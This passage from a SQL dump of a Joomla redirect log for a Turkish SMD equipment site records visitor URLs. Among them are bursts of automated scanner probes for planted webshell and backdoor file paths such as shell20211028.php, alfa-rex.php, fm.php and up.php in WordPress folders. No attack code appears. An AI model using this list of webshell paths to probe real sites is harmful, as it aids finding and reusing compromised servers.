00:00:00',301),(38757,'http://3s-technologies.com.tr/tr/wp-admin/maint/smile.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/smile.php','',19,0,'2025-03-22 02:40:23','0000-00-00 00:00:00',301),(38758,'http://3s-technologies.com.tr/tr/wp-admin/maint/wp-act.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/wp-act.php','',19,0,'2025-03-22 02:40:23','0000-00-00 00:00:00',301),(38759,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/WordPressCore/admin.php?','',3,0,'2025-03-22 02:40:24','0000-00-00 00:00:00',301),(38760,'http://3s-technologies.com.tr/tr/rcc.php',NULL,'http://3s-technologies.com.tr/rcc.php','',3,0,'2025-03-22 02:40:26','0000-00-00 00:00:00',301),(38761,'http://3s-technologies.com.tr/tr/sellsex.php',NULL,'http://3s-technologies.com.tr/sellSEX.php','',2,0,'2025-03-22 02:40:27','0000-00-00 00:00:00',301),(38762,'http://3s-technologies.com.tr/tr/rbh/log.php',NULL,'http://3s-technologies.com.tr/rbh/log.php','',3,0,'2025-03-22 02:40:32','0000-00-00 00:00:00',301),(38763,'http://3s-technologies.com.tr/tr/wp-admin/network/login.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/login.php','',3,0,'2025-03-22 02:40:33','0000-00-00 00:00:00',301),(38764,'http://3s-technologies.com.tr/tr/wp-content/plugins/hello-dolly/hello.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/hello-dolly/hello.php','',2,0,'2025-03-22 02:40:42','0000-00-00 00:00:00',301),(38765,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name',NULL,'','',11,0,'2025-03-22 13:16:19','0000-00-00 00:00:00',301),(38766,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/dirdesc',NULL,'','',10,0,'2025-03-22 13:16:26','0000-00-00 00:00:00',301),(38767,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',19,0,'2025-03-22 15:27:48','0000-00-00 00:00:00',301),(38768,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın',NULL,'','',9,0,'2025-03-22 15:29:04','0000-00-00 00:00:00',301),(38769,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,ordering',NULL,'','',8,0,'2025-03-22 15:29:44','0000-00-00 00:00:00',301),(38770,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',9,0,'2025-03-22 15:29:46','0000-00-00 00:00:00',301),(38771,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',10,0,'2025-03-22 15:29:48','0000-00-00 00:00:00',301),(38772,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2025-03-22 15:31:37','0000-00-00 00:00:00',301),(38773,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',24,0,'2025-03-22 15:31:56','0000-00-00 00:00:00',301),(38774,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',22,0,'2025-03-22 15:32:44','0000-00-00 00:00:00',301),(38775,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',21,0,'2025-03-22 15:32:46','0000-00-00 00:00:00',301),(38776,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',19,0,'2025-03-22 15:32:47','0000-00-00 00:00:00',301),(38777,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',20,0,'2025-03-22 15:32:52','0000-00-00 00:00:00',301),(38778,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',21,0,'2025-03-22 15:33:11','0000-00-00 00:00:00',301),(38779,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',21,0,'2025-03-22 15:33:13','0000-00-00 00:00:00',301),(38780,'http://3s-technologies.com.tr/en/admin/register',NULL,'','',1,0,'2025-03-22 15:44:00','0000-00-00 00:00:00',301),(38781,'https://www.3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/en/products-en/user',NULL,'https://www.3s-technologies.com.tr/en/products-en/user','',1,0,'2025-03-22 23:09:18','0000-00-00 00:00:00',301),(38782,'https://3s-technologies.com.tr/en/siteheads.php',NULL,'www.google.com','',1,0,'2025-03-24 12:28:47','0000-00-00 00:00:00',301),(38783,'https://3s-technologies.com.tr/en/classfuns.php',NULL,'www.google.com','',3,0,'2025-03-24 12:28:57','0000-00-00 00:00:00',301),(38784,'https://3s-technologies.com.tr/en/userfuns.php',NULL,'www.google.com','',3,0,'2025-03-24 12:29:02','0000-00-00 00:00:00',301),(38785,'https://3s-technologies.com.tr/en/wp-content/siteheads.php',NULL,'www.google.com','',1,0,'2025-03-24 12:29:10','0000-00-00 00:00:00',301),(38786,'https://3s-technologies.com.tr/en/hplfuns.php',NULL,'www.google.com','',3,0,'2025-03-24 12:29:17','0000-00-00 00:00:00',301),(38787,'https://3s-technologies.com.tr/tr/media/system/js/tabs.js.map',NULL,'','',1,0,'2025-03-24 14:31:11','0000-00-00 00:00:00',301),(38788,'https://www.3s-technologies.com.tr/tr/media/system/js/punycode.js.map',NULL,'','',1,0,'2025-03-24 14:58:48','0000-00-00 00:00:00',301),(38789,'https://www.3s-technologies.com.tr/tr/media/system/js/validate.js.map',NULL,'','',1,0,'2025-03-24 15:08:03','0000-00-00 00:00:00',301),(38790,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-en.js.map',NULL,'','',1,0,'2025-03-24 15:18:17','0000-00-00 00:00:00',301),(38791,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-en.js.map',NULL,'','',1,0,'2025-03-24 15:19:14','0000-00-00 00:00:00',301),(38792,'https://www.3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/behaviour.js.map',NULL,'','',1,0,'2025-03-24 15:20:03','0000-00-00 00:00:00',301),(38793,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-tr.js.map',NULL,'','',1,0,'2025-03-24 15:22:32','0000-00-00 00:00:00',301),(38794,'https://3s-technologies.com.tr/tr/media/system/js/keepalive.js.map',NULL,'','',1,0,'2025-03-24 15:26:24','0000-00-00 00:00:00',301),(38795,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/jquery.validationengine.js.map',NULL,'','',1,0,'2025-03-24 15:29:02','0000-00-00 00:00:00',301),(38796,'https://www.3s-technologies.com.tr/tr/media/system/js/keepalive.js.map',NULL,'','',1,0,'2025-03-24 15:31:22','0000-00-00 00:00:00',301),(38797,'https://www.3s-technologies.com.tr/tr/media/system/js/caption.js.map',NULL,'','',1,0,'2025-03-24 15:35:53','0000-00-00 00:00:00',301),(38798,'https://www.3s-technologies.com.tr/tr/media/jui/js/bootstrap.min.js.map',NULL,'','',1,0,'2025-03-24 15:38:20','0000-00-00 00:00:00',301),(38799,'https://3s-technologies.com.tr/tr/media/system/js/punycode.js.map',NULL,'','',1,0,'2025-03-24 15:40:30','0000-00-00 00:00:00',301),(38800,'https://3s-technologies.com.tr/tr/media/system/js/validate.js.map',NULL,'','',1,0,'2025-03-24 15:40:47','0000-00-00 00:00:00',301),(38801,'https://www.3s-technologies.com.tr/tr/media/plg_captcha_recaptcha/js/recaptcha.min.js.map',NULL,'','',1,0,'2025-03-24 15:40:53','0000-00-00 00:00:00',301),(38802,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmsite.js.map',NULL,'','',1,0,'2025-03-24 16:25:08','0000-00-00 00:00:00',301),(38803,'https://www.3s-technologies.com.tr/tr/modules/mod_djimageslider/assets/js/slider.js.map',NULL,'','',1,0,'2025-03-24 16:25:46','0000-00-00 00:00:00',301),(38804,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/dynupdate.js.map',NULL,'','',1,0,'2025-03-24 16:30:36','0000-00-00 00:00:00',301),(38805,'https://www.3s-technologies.com.tr/tr/templates/beez5/javascript/hide.js.map',NULL,'','',1,0,'2025-03-24 16:32:21','0000-00-00 00:00:00',301),(38806,'https://www.3s-technologies.com.tr/tr/media/system/js/core.js.map',NULL,'','',1,0,'2025-03-24 16:33:34','0000-00-00 00:00:00',301),(38807,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmprices.js.map',NULL,'','',1,0,'2025-03-24 16:33:38','0000-00-00 00:00:00',301),(38808,'https://www.3s-technologies.com.tr/tr/media/jui/js/jquery-migrate.min.js.map',NULL,'','',1,0,'2025-03-24 16:35:07','0000-00-00 00:00:00',301),(38809,'https://www.3s-technologies.com.tr/tr/media/system/js/mootools-more.js.map',NULL,'','',1,0,'2025-03-24 16:36:29','0000-00-00 00:00:00',301),(38810,'https://www.3s-technologies.com.tr/tr/media/system/js/mootools-core.js.map',NULL,'','',1,0,'2025-03-24 16:37:12','0000-00-00 00:00:00',301),(38811,'https://www.3s-technologies.com.tr/tr/media/jui/js/jquery.min.js.map',NULL,'','',1,0,'2025-03-24 16:38:27','0000-00-00 00:00:00',301),(38812,'https://3s-technologies.com.tr/tr/media/jui/js/bootstrap.min.js.map',NULL,'','',1,0,'2025-03-24 16:39:02','0000-00-00 00:00:00',301),(38813,'https://www.3s-technologies.com.tr/tr/templates/beez5/javascript/md_stylechanger.js.map',NULL,'','',1,0,'2025-03-24 16:39:11','0000-00-00 00:00:00',301),(38814,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/chosen.jquery.min.js.map',NULL,'','',1,0,'2025-03-24 16:41:52','0000-00-00 00:00:00',301),(38815,'https://www.3s-technologies.com.tr/tr/modules/mod_virtuemart_cart/assets/js/update_cart.js.map',NULL,'','',1,0,'2025-03-24 16:43:23','0000-00-00 00:00:00',301),(38816,'https://www.3s-technologies.com.tr/tr/media/djextensions/jquery-easing/jquery.easing.min.js.map',NULL,'','',1,0,'2025-03-24 16:44:37','0000-00-00 00:00:00',301),(38817,'https://www.3s-technologies.com.tr/tr/media/jui/js/jquery-noconflict.js.map',NULL,'','',1,0,'2025-03-24 16:45:14','0000-00-00 00:00:00',301),(38818,'https://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/jquery.fancybox-1.3.4.pack.js.map',NULL,'','',1,0,'2025-03-24 16:45:46','0000-00-00 00:00:00',301),(38819,'https://3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/behaviour.js.map',NULL,'','',1,0,'2025-03-24 16:50:03','0000-00-00 00:00:00',301),(38820,'https://3s-technologies.com.tr/tr/mar/function.php',NULL,'https://3s-technologies.com.tr//mar/function.php','',1,0,'2025-03-24 19:14:12','0000-00-00 00:00:00',301),(38821,'https://3s-technologies.com.tr/tr/wp-content/plugins/seox/up.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/seox/up.php','',1,0,'2025-03-24 19:14:14','0000-00-00 00:00:00',301),(38822,'https://3s-technologies.com.tr/tr/wp-content/themes/wordpress-mag/up.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/wordpress-mag/up.php','',1,0,'2025-03-24 19:14:16','0000-00-00 00:00:00',301),(38823,'https://3s-technologies.com.tr/tr/wp-content/themes/wordpress-mag/0x1949.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/wordpress-mag/0x1949.php','',1,0,'2025-03-24 19:14:17','0000-00-00 00:00:00',301),(38824,'https://3s-technologies.com.tr/tr/wp-content/themes/pridmag/contact.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/pridmag/contact.php','',1,0,'2025-03-24 19:14:18','0000-00-00 00:00:00',301),(38825,'https://3s-technologies.com.tr/tr/uploaded_script.php',NULL,'https://3s-technologies.com.tr//uploaded_script.php','',1,0,'2025-03-24 19:14:20','0000-00-00 00:00:00',301),(38826,'https://3s-technologies.com.tr/tr/wp-content/plugins/fix5/index.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/fix5/index.php','',1,0,'2025-03-24 19:14:23','0000-00-00 00:00:00',301),(38827,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmsite.js.map',NULL,'','',1,0,'2025-03-25 05:48:41','0000-00-00 00:00:00',301),(38828,'http://3s-technologies.com.tr/tr/templates/beez5/javascript/md_stylechanger.js.map',NULL,'','',1,0,'2025-03-25 05:54:58','0000-00-00 00:00:00',301),(38829,'http://3s-technologies.com.tr/tr/media/system/js/caption.js.map',NULL,'','',1,0,'2025-03-25 05:56:33','0000-00-00 00:00:00',301),(38830,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-tr.js.map',NULL,'','',1,0,'2025-03-25 06:01:38','0000-00-00 00:00:00',301),(38831,'http://3s-technologies.com.tr/tr/media/jui/js/jquery.min.js.map',NULL,'','',1,0,'2025-03-25 06:18:35','0000-00-00 00:00:00',301),(38832,'http://3s-technologies.com.tr/tr/templates/beez5/javascript/hide.js.map',NULL,'','',1,0,'2025-03-25 06:19:49','0000-00-00 00:00:00',301),(38833,'http://3s-technologies.com.tr/tr/media/system/js/core.js.map',NULL,'','',1,0,'2025-03-25 06:28:35','0000-00-00 00:00:00',301),(38834,'http://3s-technologies.com.tr/tr/media/jui/js/jquery-noconflict.js.map',NULL,'','',1,0,'2025-03-25 06:36:57','0000-00-00 00:00:00',301),(38835,'http://3s-technologies.com.tr/tr/media/djextensions/jquery-easing/jquery.easing.min.js.map',NULL,'','',1,0,'2025-03-25 06:40:03','0000-00-00 00:00:00',301),(38836,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/dynupdate.js.map',NULL,'','',1,0,'2025-03-25 06:58:45','0000-00-00 00:00:00',301),(38837,'http://3s-technologies.com.tr/tr/media/system/js/mootools-core.js.map',NULL,'','',1,0,'2025-03-25 07:18:44','0000-00-00 00:00:00',301),(38838,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/chosen.jquery.min.js.map',NULL,'','',1,0,'2025-03-25 07:25:23','0000-00-00 00:00:00',301),(38839,'http://3s-technologies.com.tr/tr/media/system/js/mootools-more.js.map',NULL,'','',1,0,'2025-03-25 07:32:15','0000-00-00 00:00:00',301),(38840,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/assets/js/slider.js.map',NULL,'','',1,0,'2025-03-25 07:34:00','0000-00-00 00:00:00',301),(38841,'http://3s-technologies.com.tr/tr/media/jui/js/jquery-migrate.min.js.map',NULL,'','',1,0,'2025-03-25 07:35:52','0000-00-00 00:00:00',301),(38842,'http://3s-technologies.com.tr/tr/modules/mod_virtuemart_cart/assets/js/update_cart.js.map',NULL,'','',1,0,'2025-03-25 07:39:06','0000-00-00 00:00:00',301),(38843,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmprices.js.map',NULL,'','',1,0,'2025-03-25 07:40:42','0000-00-00 00:00:00',301),(38844,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/chosen.jquery.min.js.map',NULL,'','',1,0,'2025-03-25 08:06:40','0000-00-00 00:00:00',301),(38845,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmprices.js.map',NULL,'','',1,0,'2025-03-25 08:07:21','0000-00-00 00:00:00',301),(38846,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/jquery.validationengine.js.map',NULL,'','',1,0,'2025-03-25 08:08:44','0000-00-00 00:00:00',301),(38847,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/jquery.fancybox-1.3.4.pack.js.map',NULL,'','',1,0,'2025-03-25 08:09:05','0000-00-00 00:00:00',301),(38848,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmsite.js.map',NULL,'','',1,0,'2025-03-25 08:19:07','0000-00-00 00:00:00',301),(38849,'http://www.3s-technologies.com.tr/tr/modules/mod_virtuemart_cart/assets/js/update_cart.js.map',NULL,'','',1,0,'2025-03-25 08:29:01','0000-00-00 00:00:00',301),(38850,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-tr.js.map',NULL,'','',1,0,'2025-03-25 08:31:11','0000-00-00 00:00:00',301),(38851,'http://www.3s-technologies.com.tr/tr/media/system/js/tabs.js.map',NULL,'','',1,0,'2025-03-25 08:36:07','0000-00-00 00:00:00',301),(38852,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/dynupdate.js.map',NULL,'','',1,0,'2025-03-25 08:37:12','0000-00-00 00:00:00',301),(38853,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/ioxi/retu.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/ioxi/retu.php','',1,0,'2025-03-25 11:14:50','0000-00-00 00:00:00',301),(38854,'http://www.3s-technologies.com.tr/tr/kean.php',NULL,'http://www.3s-technologies.com.tr//kean.php','',1,0,'2025-03-25 11:14:51','0000-00-00 00:00:00',301),(38855,'http://www.3s-technologies.com.tr/tr/first.php',NULL,'http://www.3s-technologies.com.tr//first.php','',3,0,'2025-03-25 11:14:53','0000-00-00 00:00:00',301),(38856,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2024/01/rxr.php',NULL,'http://www.3s-technologies.com.tr//wp-content/uploads/2024/01/RxR.php','',1,0,'2025-03-25 11:14:55','0000-00-00 00:00:00',301),(38857,'http://www.3s-technologies.com.tr/tr/wp-includes/blocks/post-title/post-title/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/blocks/post-title/post-title/index.php','',1,0,'2025-03-25 11:14:58','0000-00-00 00:00:00',301),(38858,'http://www.3s-technologies.com.tr/tr/wp-includes/js/dist/dist/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/js/dist/dist/index.php','',1,0,'2025-03-25 11:14:59','0000-00-00 00:00:00',301),(38859,'http://www.3s-technologies.com.tr/tr/wp-includes/blocks/page-list/page-list/index.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/blocks/page-list/page-list/index.php','',1,0,'2025-03-25 11:15:01','0000-00-00 00:00:00',301),(38860,'http://www.3s-technologies.com.tr/tr/cjfuns.php',NULL,'http://www.3s-technologies.com.tr//cjfuns.php','',1,0,'2025-03-25 11:15:04','0000-00-00 00:00:00',301),(38861,'http://www.3s-technologies.com.tr/tr/wp-maps.php',NULL,'http://www.3s-technologies.com.tr//wp-maps.php','',1,0,'2025-03-25 11:15:07','0000-00-00 00:00:00',301),(38862,'http://www.3s-technologies.com.tr/tr/wp-content/themes/divi/404.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/Divi/404.php','',1,0,'2025-03-25 11:15:08','0000-00-00 00:00:00',301),(38863,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/nav.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/includes/nav.php','',1,0,'2025-03-25 11:15:10','0000-00-00 00:00:00',301),(38864,'http://www.3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge/core32.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Core32.php','',1,0,'2025-03-25 11:15:11','0000-00-00 00:00:00',301),(38865,'http://www.3s-technologies.com.tr/tr/heh.php',NULL,'http://www.3s-technologies.com.tr//heh.php','',1,0,'2025-03-25 11:15:12','0000-00-00 00:00:00',301),(38866,'http://www.3s-technologies.com.tr/tr/newfile.php',NULL,'http://www.3s-technologies.com.tr//NewFile.php','',7,0,'2025-03-25 11:15:14','0000-00-00 00:00:00',301),(38867,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/view-more/ioxi.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/view-more/ioxi.php','',1,0,'2025-03-25 11:15:16','0000-00-00 00:00:00',301),(38868,'http://www.3s-technologies.com.tr/tr/baxa1.php7',NULL,'http://www.3s-technologies.com.tr//baxa1.php7','',2,0,'2025-03-25 11:15:17','0000-00-00 00:00:00',301),(38869,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/erinyani/baxa1.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/erinyani/baxa1.php','',1,0,'2025-03-25 11:15:19','0000-00-00 00:00:00',301),(38870,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/seoxx/randkeyword.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/seoxx/randkeyword.php','',1,0,'2025-03-25 11:15:22','0000-00-00 00:00:00',301),(38871,'http://www.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/zmfm.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/sitemaps/providers/zmFM.php','',1,0,'2025-03-25 11:15:25','0000-00-00 00:00:00',301),(38872,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/zmfm.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/pomo/zmFM.php','',1,0,'2025-03-25 11:15:27','0000-00-00 00:00:00',301),(38873,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/backup_index.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/backup_index.php','',1,0,'2025-03-25 11:15:29','0000-00-00 00:00:00',301),(38874,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/three-column-screen-layout/db.php?u',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/three-column-screen-layout/db.php?u','',1,0,'2025-03-25 11:15:32','0000-00-00 00:00:00',301),(38875,'http://www.3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns/index.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/twentytwentythree/patterns/index.php','',1,0,'2025-03-25 11:15:37','0000-00-00 00:00:00',301),(38876,'http://www.3s-technologies.com.tr/tr/wp-content/themes/too.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/too.php','',2,0,'2025-03-25 11:15:40','0000-00-00 00:00:00',301),(38877,'http://www.3s-technologies.com.tr/tr/wp-admin/images/mhbgf.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/images/Mhbgf.php','',1,0,'2025-03-25 11:15:44','0000-00-00 00:00:00',301),(38878,'http://www.3s-technologies.com.tr/tr/wp-content/mich-rep.php',NULL,'http://www.3s-technologies.com.tr//wp-content/mich-REP.php','',1,0,'2025-03-25 11:15:45','0000-00-00 00:00:00',301),(38879,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade/about.php',NULL,'http://www.3s-technologies.com.tr//wp-content/upgrade/about.php','',6,0,'2025-03-25 11:15:47','0000-00-00 00:00:00',301),(38880,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/pomo.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/pomo/pomo.php','',1,0,'2025-03-25 11:15:48','0000-00-00 00:00:00',301),(38881,'http://www.3s-technologies.com.tr/tr/wp-admin/css/go.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/css/go.php','',1,0,'2025-03-25 11:15:50','0000-00-00 00:00:00',301),(38882,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/yellow.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/pomo/yellow.php','',1,0,'2025-03-25 11:15:52','0000-00-00 00:00:00',301),(38883,'http://www.3s-technologies.com.tr/tr/click.php',NULL,'http://www.3s-technologies.com.tr//click.php','',9,0,'2025-03-25 11:15:54','0000-00-00 00:00:00',301),(38884,'http://www.3s-technologies.com.tr/tr/termps.php',NULL,'http://www.3s-technologies.com.tr//termps.php','',1,0,'2025-03-25 11:15:58','0000-00-00 00:00:00',301),(38885,'http://www.3s-technologies.com.tr/tr/sck.php',NULL,'http://www.3s-technologies.com.tr//sck.php','',1,0,'2025-03-25 11:16:00','0000-00-00 00:00:00',301),(38886,'http://www.3s-technologies.com.tr/tr/ans.php',NULL,'http://www.3s-technologies.com.tr//ans.php','',1,0,'2025-03-25 11:16:02','0000-00-00 00:00:00',301),(38887,'http://www.3s-technologies.com.tr/tr/buy.php',NULL,'http://www.3s-technologies.com.tr//buy.php','',8,0,'2025-03-25 11:16:06','0000-00-00 00:00:00',301),(38888,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/core-econx/up.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/Core-EconX/up.php','',4,0,'2025-03-25 11:16:08','0000-00-00 00:00:00',301),(38889,'http://www.3s-technologies.com.tr/tr/wp-content/termps.php',NULL,'http://www.3s-technologies.com.tr//wp-content/termps.php','',1,0,'2025-03-25 11:16:10','0000-00-00 00:00:00',301),(38890,'http://www.3s-technologies.com.tr/tr/pwp-admin/network/login.php',NULL,'http://www.3s-technologies.com.tr//pwp-admin/network/login.php','',1,0,'2025-03-25 11:16:12','0000-00-00 00:00:00',301),(38891,'http://www.3s-technologies.com.tr/tr/wander.php',NULL,'http://www.3s-technologies.com.tr//wander.php','',2,0,'2025-03-25 11:16:17','0000-00-00 00:00:00',301),(38892,'http://www.3s-technologies.com.tr/tr/wp-includes/css/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/css/about.php','',5,0,'2025-03-25 11:16:20','0000-00-00 00:00:00',301),(38893,'http://www.3s-technologies.com.tr/tr/admin/function.php',NULL,'http://www.3s-technologies.com.tr//admin/function.php','',13,0,'2025-03-25 11:16:24','0000-00-00 00:00:00',301),(38894,'http://www.3s-technologies.com.tr/tr/wp-content/themes/deeto/login.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/deeto/login.php','',4,0,'2025-03-25 11:16:27','0000-00-00 00:00:00',301),(38895,'http://www.3s-technologies.com.tr/tr/wp-includes/ixr/wp-login.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/IXR/wp-login.php','',1,0,'2025-03-25 11:16:28','0000-00-00 00:00:00',301),(38896,'http://www.3s-technologies.com.tr/tr/.tmb/about.php',NULL,'http://www.3s-technologies.com.tr//.tmb/about.php','',1,0,'2025-03-25 11:16:30','0000-00-00 00:00:00',301),(38897,'http://www.3s-technologies.com.tr/tr/wp-content/themes/about.php',NULL,'http://www.3s-technologies.com.tr//wp-content/themes/about.php','',11,0,'2025-03-25 11:16:32','0000-00-00 00:00:00',301),(38898,'http://www.3s-technologies.com.tr/tr/shell20211028.php',NULL,'http://www.3s-technologies.com.tr//shell20211028.php','',6,0,'2025-03-25 11:16:35','0000-00-00 00:00:00',301),(38899,'http://www.3s-technologies.com.tr/tr/wp-includes/images/about.php',NULL,'http://www.3s-technologies.com.tr//wp-includes/images/about.php','',2,0,'2025-03-25 11:16:36','0000-00-00 00:00:00',301),(38900,'http://www.3s-technologies.com.tr/tr/makeasmtp.php',NULL,'http://www.3s-technologies.com.tr//makeasmtp.php','',10,0,'2025-03-25 11:16:38','0000-00-00 00:00:00',301),(38901,'http://www.3s-technologies.com.tr/tr/mah/function.php',NULL,'http://www.3s-technologies.com.tr//mah/function.php','',2,0,'2025-03-25 11:16:39','0000-00-00 00:00:00',301),(38902,'http://www.3s-technologies.com.tr/tr/file.php',NULL,'http://www.3s-technologies.com.tr//file.php','',29,0,'2025-03-25 11:16:46','0000-00-00 00:00:00',301),(38903,'http://www.3s-technologies.com.tr/tr/admin.php',NULL,'http://www.3s-technologies.com.tr//admin.php','',28,0,'2025-03-25 11:16:48','0000-00-00 00:00:00',301),(38904,'http://www.3s-technologies.com.tr/tr/mah.php',NULL,'http://www.3s-technologies.com.tr//mah.php','',9,0,'2025-03-25 11:16:50','0000-00-00 00:00:00',301),(38905,'http://www.3s-technologies.com.tr/tr/index/function.php',NULL,'http://www.3s-technologies.com.tr//index/function.php','',20,0,'2025-03-25 11:16:53','0000-00-00 00:00:00',301),(38906,'http://www.3s-technologies.com.tr/tr/chosen.php',NULL,'http://www.3s-technologies.com.tr//chosen.php','',17,0,'2025-03-25 11:16:55','0000-00-00 00:00:00',301),(38907,'http://www.3s-technologies.com.tr/tr/fm.php',NULL,'http://www.3s-technologies.com.tr//fm.php','',9,0,'2025-03-25 11:16:56','0000-00-00 00:00:00',301),(38908,'http://www.3s-technologies.com.tr/tr/wp-admin/js/index.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/js/index.php','',8,0,'2025-03-25 11:17:03','0000-00-00 00:00:00',301),(38909,'http://www.3s-technologies.com.tr/tr/about/function.php',NULL,'http://www.3s-technologies.com.tr//about/function.php','',15,0,'2025-03-25 11:17:07','0000-00-00 00:00:00',301),(38910,'http://www.3s-technologies.com.tr/tr/alfa-rex.php',NULL,'http://www.3s-technologies.com.tr//alfa-rex.php','',1,0,'2025-03-25 11:17:09','0000-00-00 00:00:00',301),(38911,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/include.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/core-plugin/include.php','',2,0,'2025-03-25 11:17:10','0000-00-00 00:00:00',301),(38912,'http://www.3s-technologies.com.tr/tr/moon.php',NULL,'http://www.3s-technologies.com.tr//moon.php','',12,0,'2025-03-25 11:17:13','0000-00-00 00:00:00',301),(38913,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/index.php',NULL,'http://www.3s-technologies.com.tr//wp-admin/maint/index.php','',16,0,'2025-03-25 11:17:19','0000-00-00 